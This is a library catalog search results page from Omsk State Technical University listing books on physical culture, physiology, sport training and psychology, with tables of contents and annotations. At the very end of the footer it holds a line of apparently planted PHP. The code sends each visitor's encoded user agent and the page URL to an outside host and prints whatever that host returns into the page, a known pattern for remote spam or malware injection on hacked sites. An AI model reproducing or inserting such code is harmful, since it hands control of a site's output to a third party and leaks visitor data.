Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

58 пользователей


Зарегистрированных: 1 

Борисенко Елена Стефановна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДВИГАТЕЛЬНАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 105
1. 
Пономарев, Сергей Александрович. Растите малышей здоровыми [Текст] : физ. воспитание детей / С. А. Пономарев, 1992. - 90 с.
Держатели документа (Информация об экземплярах) 
2. 
Уткин, Владимир Леонидович. Биомеханические аспекты спортивной тактики [Текст] / В. Л. Уткин ; под общ. ред. В. М. Зациорского, 1984. - 126, [2] с.
Держатели документа (Информация об экземплярах) 
3. 
Спорт и образ жизни [Текст] : сб. статей / сост.: В. И. Столяров, З. Кравчик, 1979. - 276, [2] с.
Держатели документа (Информация об экземплярах) 
4. 
Мильнер Евгений Григорьевич Формула жизни [Текст] : мед.-биол. основы оздоров. физ. культуры / Е. Г. Мильнер, 1991. - 110, [2] с.
Держатели документа (Информация об экземплярах) 
5. 
Фомин, Николай Андреевич. Физиологические основы двигательной активности [Текст] / Н. А. Фомин, Ю. Н. Вавилов, 1991. - 223, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
6. 
Скородумова, Анна Петровна. Современный теннис: основы тренировки [Текст] / А. П. Скородумова, 1984. - 160 с.
Держатели документа (Информация об экземплярах) 
7. 
Соколов, Павел Павлович. Победа над бессонницей [Текст]. Вып. 1, 1989. - 47, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Гандельсман, Александр Борисович. Физическая культура и здоровье (Физические упражнения при гипертонической болезни) [Текст] / А. Б. Гандельсман, Т. А. Евдокимова, В. И. Хитрова, 1986. - 31, [1] с.
Держатели документа (Информация об экземплярах) 
9. 
Пономарев С. А. Растите малышей здоровыми [Текст] : физ. воспитание детей до 3 лет / С. А. Пономарев, 1989. - 45, [3] с.
Держатели документа (Информация об экземплярах) 
10. 
Станков, Анатолий Георгиевич. Индивидуализация подготовки борцов [Текст] / А. Г. Станков, В. П. Климин, И. А. Письменский, 1984. - 240 с.
Держатели документа (Информация об экземплярах) 
11. 
Келлер, Владимир Станиславович. Тренировка фехтовальщиков [Текст] / В. Келлер, Д. Тышлер, 1972. - 180, [2] с.
Держатели документа (Информация об экземплярах) 
12. 
Физическая культура [Текст] : Курс лекций / Ж. Б. Сафонова, В. М. Шулятьев, В. Ф. Красавина и др.; под ред. Ж. Б. Сафоновой, 2002. - 154 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
13. 
Физическая культура [Текст] : курс лекций / Ж. Б. Сафонова [и др.]. ; под ред. Ж. Б. Сафоновой, 2001. - 155 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
14. 
Яковлев, Алексей Борисович. Уравнение динамики двигательной установки [Текст] : Учеб. пособие / А. Б. Яковлев, 1999. - 87 с.
Держатели документа (Информация об экземплярах) 
Полный текст
15. 
Физическая культура [Текст] : Курс лекций / Ж. Б. Сафонова, В. М. Шулятьев, В. Ф. Красавина и др.; под ред. Ж. Б. Сафоновой, 2003. - 149 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Пособие включает цикл лекций обязательного теоретико-методического материала для итоговой аттестации по дисциплине "Физическая культура" и позволяет систематизировать и углубить знания по основам теории и методики физического воспитания. Освещены вопросы методики формирования навыка здорового образа жизни, психофизической подготовки, врачебно-педагогических наблюдений при организованных и самостоятельных формах занятий физической культурой.

Предназначено для преподавателей физической культуры и студентов высших и средних учебных заведений.

Полный текст
16. 
Вайнер, Эдуард Наумович. Валеология [Текст] : Учеб. для вузов / Э. Н. Вайнер, 2002. - 411, [3] с.
Держатели документа (Информация об экземплярах) 

Учебник разработан в соответствии с программой дисциплины для студентов невалеологических специальностей вузов и университетов. Основной целью учебника является подготовка студента к профессиональной педагогической деятельности, ориентированной на здоровьесберегающее обучение и воспитание учащихся.

17. 
Физическая культура [Текст] : курс лекций / Ж. Б. Сафонова [и др.] ; под ред. Ж. Б. Сафоновой, 2007. - 174 с.
Оглавление 
  • Предисловие (ко второму изданию). - с.3
  • Физическая культура в общекультурной и профессиональной подготовке студентов. - с.5
  • Физическая культура и спорт - составляющие общей культуры общества. - с.5
  • Ценности физической культуры. - с.7
  • Основные понятия и терминология. - с.9
  • Понятие о системе физической культуры. - с.11
  • Содержание и функции физической культуры студентов в структуре профессионального образования. - с.12
  • Основные положения организации физического воспитания в вузе. - с.14
  • Социально-биологические основы физической культуры (часть 1). - с.19
  • Анатомо-морфологические особенности и основные физиологические функции организма. - с.19
  • Функциональные системы организма. - с.20
  • Костная система. - с.20
  • Мышечная система. - с.21
  • Физиологические системы организма. - с.22
  • Кровеносная система. - с.22
  • Сердечно-сосудистая система. - с.24
  • Дыхательная система. - с.24
  • Системы пищеварения и выделения. - с.26
  • Нервная система. - с.28
  • Эндокринная система. - с.28
  • Социально-биологические основы физической культуры (часть 2). - с.29
  • Организм человека как единая саморазвивающаяся и саморегулирующаяся система. - с.30
  • Внешняя среда - природные и социально-экологические факторы (их влияние на организм и жизнедеятельность). - с.34
  • Биологические ритмы и работоспособность. - с.36
  • Гипокинезия и гиподинамия, их неблагоприятное влияние на организм. - с.38
  • Средства физической культуры в совершенствовании организма, обеспечении его устойчивости к физической и умственной деятельности. - с.38
  • Физиологические механизмы и закономерности совершенствования отдельных систем организма под воздействием направленной физической тренировки. - с.39
  • Двигательная функция и повышение уровня адаптации и устойчивости организма человека к различным условиям. - с.40
  • Основы здорового образа жизни студента. Физическая культура в обеспечении здоровья. - с.41
  • Понятие "Здоровье", его содержание и критерии. - с.41
  • Влияние образа жизни на здоровье. - с.43
  • Факторы риска и здоровье. - с.44
  • Направленность поведения человека на обеспечение своего здоровья. - с.46
  • Адекватное и неадекватное отношение к здоровью, его самооценка студентами. - с.46 :
  • Индивидуально-психологические особенности личности. - с.47
  • Содержательные особенности составляющих здорового образа жизни: режим труда и отдыха, личная гигиена. - с.49
  • Режим труда и отдыха. - с.49
  • Сон и профилактика его нарушений. - с.50
  • Личная гигиена и закаливание. - с.51
  • Культура сексуального поведения. - с.52
  • Психофизиологические основы учебного труда и интеллектуальной деятельности. Средства физической культуры в регулировании работоспособности. - с.53
  • Объективные и субъективные факторы обучения и реакция на них организма студентов. - с.53
  • Типичные особенности жизнедеятельности студентов в период экзаменов. - с.55
  • Работоспособность и общие закономерности изменения ее у студентов. - с.57
  • Объективные и субъективные признаки усталости, утомления и переутомления, их причины и профилактика. - с.58
  • Формы и методы психорегуляции в учебной и спортивной видах деятельности. - с.61
  • Особенности рационального использования малых форм физической культуры в режиме учебного труда студентов. - с.62
  • Средства физической культуры в регулировании психоэмоционального и функционального состояния студентов. - с.63
  • Понятие о релаксации и аутотренинге. - с.64
  • Оперативная тонизация. - с.65
  • Роль оздоровительно-спортивного лагеря в оптимизации условий жизнедеятельности студентов. - с.66
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 1). - с.67
  • Общая физическая подготовка. - с.67
  • Специальная физическая подготовка. - с.68
  • Спортивная подготовка. - с.68
  • Профессионально-прикладная физическая подготовка как разновидность специальной физической подготовки. - с.71
  • Интенсивность физических нагрузок. - с.71
  • Энергозатраты при физических нагрузках разной интенсивности. - с.72
  • Значение мышечной релаксации (расслабления). - с.74
  • Коррекция физического развития телосложения, двигательной и функциональной подготовленности средствами физической культуры и спорта. - с.76
  • Формы занятий физическими упражнениями. - с.78
  • Построение и структура учебно-тренировочного занятия. - с.79
  • Общая и моторная плотность занятия. - с.79
  • Общая физическая и спортивная подготовка в системе физического воспитания (часть 2). - с.80
  • Методические принципы физического воспитания. - с.80
  • Средства и методы физического воспитания. - с.85
  • Средства физического воспитания. - с.85
  • Методы физического воспитания. - с.85
  • Основы обучения движениям. Этапы обучения движениям. - с.87
  • Развитие физических качеств. - с.90
  • Формирование психических качеств, черт, свойств личности в процессе физического воспитания. - с.95
  • Основы методики самостоятельных занятий физическими упражнениями. - с.96
  • Оптимальная двигательная активность и ее воздействие на организм, здоровье и работоспособность. - с.96
  • Формирование мотивов и организация самостоятельных занятий физическими упражнениями. - с.97
  • Управление процессом самостоятельных занятий. - с.97
  • Формы и содержание самостоятельных занятий физическими упражнениями. - с.98
  • Планирование объема и интенсивности физических упражнений с учетом умственной учебной деятельности . - с.100
  • Возрастные особенности самостоятельных занятий для женщин. - с.101
  • Гигиена самостоятельных занятий: уход за кожей, питьевой режим, питание. - с.102
  • Самоконтроль за эффективностью самостоятельных занятий. - с.103
  • Индивидуальный выбор видов спорта или системы физических упражнений. - с.104
  • Определение понятия "спорт". Его принципиальное отличие от других видов занятий физическими упражнениями. - с.104
  • Массовый спорт. Спорт высших достижений. - с.105
  • Спортивная классификация. - с.106
  • Национальные виды спорта. - с.106
  • Студенческий спорт. - с.108
  • Специальные зачетные требования и нормативы. Спорт в свободное время. - с.108
  • Спортивные соревнования. - с.109
  • Нетрадиционные виды спорта. - с.110
  • Мотивы индивидуального выбора студентом конкретного вида спорта. - с.111
  • Характеристика основных групп видов спорта, развивающих определенные физические качества. - с.112
  • Особенности занятий избранным видом спорта (системой физических упражнений). - с.113
  • Краткая историческая справка о виде спорта. - с.113
  • Волейбол. - с.113
  • Баскетбол. - с.114
  • Футбол. - с.114
  • Плавание. - с.114
  • Лыжный спорт. - с.115
  • Легкая атлетика. - с.115
  • Борьба. - с.116
  • Пауэрлифтинг. - с.116
  • Аэробика. - с.116
  • Влияние различных видов спорта на физическое развитие, функциональную подготовленность, психические качества и свойства личности. - с.117
  • Определение целей и задач спортивной подготовленности. Перспективное и текущее планирование. - с.119
  • Основные пути достижения необходимой структуры подготовленности: физической, технической, тактической и психической. - с.120
  • Специальные зачетные требования и нормативы в избранном виде спорта. - с.122
  • Врачебно-педагогические исследования и самоконтроль занимающихся физическими упражнениями и спортом. - с.123
  • Врачебный контроль как условие допуска к занятиям физическими упражнениями и спортом, его содержание и периодичность. - с.123
  • Методы исследований, применяемые во врачебном контроле. - с.124
  • Антропометрические исследования. - с.124
  • Метод стандартов. - с.125
  • Метод корреляции . - с.125
  • Метод монограмм. - с.125
  • Метод индексов. - с.126
  • Исследование функционального состояния организма и физической работоспособности. - с.127
  • Исследование функции дыхания. - с.129
  • Исследование нервной системы. - с.130
  • Объективные и субъективные показатели самоконтроля. - с.131
  • Профессионально-прикладная физическая подготовка (ППФП) студентов. - с.132
  • Краткая историческая справка. - с.132
  • Личная и социально-экономическая необходимость специальной физической подготовки человека к труду в современных условиях. - с.133
  • Понятие ППФП, ее место в системе физического воспитания студентов. - с.136
  • Основные факторы, определяющие содержание ППФП студентов. - с.140
  • Дополнительные факторы, влияющие на содержание ППФП. - с.142
  • Методика подбора средств ППФП и и видов спорта. - с.142
  • Организация, формы и средства ППФП в вузе. - с.144
  • Особенности ППФП студентов на учебных занятиях и во внеурочное время. - с.145
  • Система контроля ППФП студентов. - с.147
  • Физическая культура в производственной деятельности бакалавра и специалиста. - с.149
  • Производственная физическая культура (ПФК). Понятие "Производственная физическая культура"; ее цели и задачи . - с.149
  • Методические основы ПФК. - с.151
  • Влияние условий труда и быта специалиста на выбор форм, методов и средств ПФК в рабочее и свободное время. - с.151
  • Производственная физическая культура в рабочее время ("Производственная гимнастика"). - с.153
  • Методика составления комплексов в различных видах производственной гимнастики и определение их места в течение рабочего дня. - с.156
  • Профилактические комплексы физических упражнений для работников умственного труда и студентов технического вуза. - с.156
  • Физическая культура и спорт специалиста в свободное от работы время. - с.158
  • Утренняя гигиеническая гимнастика (УГГ). - с.161
  • Утренние специально направленные занятия физическими упражнениями. - с.162
  • Попутная тренировка. - с.163
  • Физкультурно-спортивные занятия для активного отдыха и повышения функциональных возможностей. - с.163
  • Использование дополнительных средств повышения общей и профессиональной работоспособности в процессе занятий физическими упражнениями. - с.164
  • Профилактика профессиональных заболеваний и травматизма средствами физической культуры. - с.165
  • Влияние индивидуальных особенностей, географо-климатических факторов на содержание производственной физической культуры. - с.166
  • Роль личности руководителя во внедрении физической культуры в производственный коллектив. - с.167
Держатели документа (Информация об экземплярах) 

Включает цикл лекций обязательного теоретико-методического материала для итоговой аттестации по дисциплине "Физическая культура" и позволяет систематизировать и углублять знания по основам теории и методике физического воспитания. Освещены вопросы методики формирования навыка здорового образа жизни, психофизической подготовки, врачебно-педагогических наблюдений при организованных и самостоятельных формах занятий физической культурой.

Предназначен для преподавателей физической культуры и студентов вузов.

Полный текст
18. 
Физиология человека [Текст] : в 3 т. / под ред. Р. Шмидта, Г. Тевса; пер.с англ. под ред. П. Г. Костюка. Т. 1 / Й. Дудель [и др.] ; пер. с англ. Н. Н. Алипова [и др.], 2005. - 323 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- КЛЕТКА -- ФИЗИОЛОГИЯ КЛЕТКИ -- КЛЕТОЧНАЯ ФИЗИОЛОГИЯ -- ВОЗБУЖДЕНИЕ -- ЭЛЕКТРИЧЕСКОЕ ВОЗБУЖДЕНИЕ -- НЕРВНАЯ СИСТЕМА -- МЫШЦА -- ДВИГАТЕЛЬНАЯ СИСТЕМА -- ЦЕНТРАЛЬНАЯ НЕРВНАЯ СИСТЕМА -- СЕНСОРНАЯ ФИЗИОЛОГИЯ -- НОЦИЦЕПЦИЯ -- БОЛЬ -- ЗРЕНИЕ -- РАВНОВЕСИЕ -- СЛУХ -- РЕЧЬ -- ВКУС -- ОБОНЯНИЕ -- ЖАЖДА -- ГОЛОД -- РЕГУЛЯЦИЯ -- ВЕГЕТАТИВНАЯ НЕРВНАЯ СИСТЕМА -- ЭНДОКРИНОЛОГИЯ -- КРОВЬ -- КРОВООБРАЩЕНИЕ -- СЕРДЦЕ -- СОСУДИСТАЯ СИСТЕМА -- ДЫХАНИЕ -- ЭНЕРГЕТИЧЕСКИЙ БАЛАНС -- ТЕПЛОВОЙ БАЛАНС -- ФИЗИОЛОГИЯ ТРУДА -- ЭКОЛОГИЧЕСКАЯ ФИЗИОЛОГИЯ -- ПИТАНИЕ -- ПИЩЕВАРЕНИЕ -- ВЫДЕЛЕНИЕ -- РЕПРОДУКЦИЯ -- БЕРЕМЕННОСТЬ -- СТАРЕНИЕ -- СТАРОСТЬ -- ПОЛОВАЯ ФУНКЦИЯ -- ПИТАНИЕ
Держатели документа (Информация об экземплярах) 

Получивший международное признание учебник физиологии, написанный немецкими авторами. На русском языке выходит третьим изданием, в трех томах. Перевод сделан со второго английского издания (23-е немецкое издание).

Т. 1 посвящен вопросам общей физиологии клетки, интегративной функции нервной системы, физиологии мышц, а также сенсорной физиологии.

Для студентов-биологов и медиков, а также физиологов и врачей.

19. 
Перепелов, Александр Николаевич. Психология и педагогика [Текст] : Конспект лекций / А. Н. Перепелов, Т. В. Савченко, 2005. - 124 с.
Ключевые слова 
Оглавление 
  • Предисловие. - с.6
  • Психология. - с.8
  • Введение. - с.8
  • Предмет и задачи психологической науки и практики. - с.8
  • Объект и предмет психологии. - с.8
  • Задачи психологической науки. - с.9
  • Основные направления психологии. - с.10
  • Психологический анализ деятельности. - с.12
  • Виды и развитие человеческой психики. - с.12
  • Виды человеческой деятельности. - с.14
  • Деятельность и психические процессы. - с.14
  • Структура деятельности человека. - с.16
  • Формы психической активности. - с.16
  • Сенсомоторные процессы. - с.18
  • Речевое общение. - с.19
  • Зарождение и развитие психики. - с.20
  • Функции психики. - с.20
  • Уровни и стадии двигательной активности. - с.21
  • Развитие высших психических функций у человека. - с.22
  • Уровни отражения действительности и развития психики человека. Происхождение и развитие сознания. - с.23
  • Сознание - высший уровень отражения действительности. - с.23
  • Особенности психического отражения действительности. - с.24
  • Сознание и бессознательное. - с.26
  • Чувственная и рациональная познавательная деятельность человека. - с.28
  • Познавательная деятельность человека. - с.28
  • Понятие об ощущении и его физиологической основе. - с.28
  • Виды ощущений. - с.29
  • Общие свойства ощущений. - с.32
  • Восприятие. Основные качества восприятия. - с.32
  • Мышление и воображение как формы познавательной деятельности. - с.35
  • Функции мышления. - с.35
  • Виды мышления и мыслительные операции. - с.36
  • Речь как инструмент мышления. - с.38
  • Воображение. Функции воображения. - с.38
  • Общее понятие о внимании. - с.40
  • Свойства внимания. - с.40
  • Функции и виды внимания. - с.42
  • Память. - с.43
  • Функции и виды памяти. - с.43
  • Классификация теорий памяти. - с.44
  • Процессы памяти. - с.49
  • Психология мотиваций и эмоций. - с.51
  • Виды мотивов. - с.51
  • Общая характеристика эмоциональных процессов. - с.52
  • Психологические теории и эмоции. - с.54
  • Воля. - с.56
  • Воля как характеристика сознания. - с.56
  • Волевая регуляция поведения. - с.58
  • Структура волевого действия. - с.59
  • Психология личности. - с.60
  • Понятие о личности в психологии. - с.60
  • Современные теории личности. - с.61
  • Формирование и развитие личности. - с.63
  • Темперамент - биологический фундамент личности. - с.64
  • Типы и свойства темпераментов. - с.65
  • Роль темперамента в трудовой и учебной деятельности. - с.67
  • Характер. - с.67
  • Структура характера. - с.67
  • Акцентуация черт характера. - с.68
  • Природные и социальные предпосылки характера. - с.69
  • Способности. - с.71
  • Понятие о способностях. - с.71
  • Задатки и талант. - с.72
  • Развитие способностей. - с.73
  • Психология управления. - с.74
  • Психологические основы управленческой деятельности. - с.74
  • Особенности межличностного взаимодействия и общения в группе. - с.74
  • Стили руководства и лидерства. Критерии оценки деятельности руководителя. - с.76
  • Педагогика. - с.79
  • Введение. - с.79
  • Педагогика в системе наук о человеке. - с.79
  • Общее представление о педагогике как науке. - с.79
  • Образование, его сущность и проблемы. - с.84
  • Педагогический процесс как система и целостное явление. - с.87
  • Характеристика обучения как дидактического процесса. - с.89
  • Сущность, функции и структура процесса обучения. - с.89
  • Методы, средства и формы организации педагогического процесса. - с.93
  • Современные теории и концепции обучения. - с.98
  • Воспитание в целостном учебно-педагогическом процессе. - с.101
  • Сущность, содержание, организация воспитания. - с.101
  • Семья как социокультурная среда развития и формирования личности. - с.104
  • Способы воспитательного воздействия на человека. - с.106
  • Педагогические технологии. - с.108
  • Подходы к пониманию технологии и ее сущность. - с.108
  • Технология организации взаимодействия в обучении. - с.112
  • Технология эффективной воспитательной деятельности руководителя. - с.114
  • Терминологический словарь. - с.118
  • Библиографический список. - с.123
Держатели документа (Информация об экземплярах) 

В доступной и краткой форме раскрываются основные аспекты дисциплины "Психология и педагогика". Конспект лекций составлен в соответствии с Государственным образовательным стандартом РФ ВПО, действующим федеральным компонентом по курсу "Общие гуманитарные и социально-экономические дисциплины".

Предназначен для студентов дистанционного обучения всех специальностей, изучающих базовый курс психологии и педагогики.

Полный текст
20. 
Яковлев, Алексей Борисович. Системы автоматического управления и регуляторы РДУ [Текст] : Учеб. пособие / А. Б. Яковлев, 1999. - 72 .
Держатели документа (Информация об экземплярах) 
Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2845 - 25.03.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 2.09 с.12 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;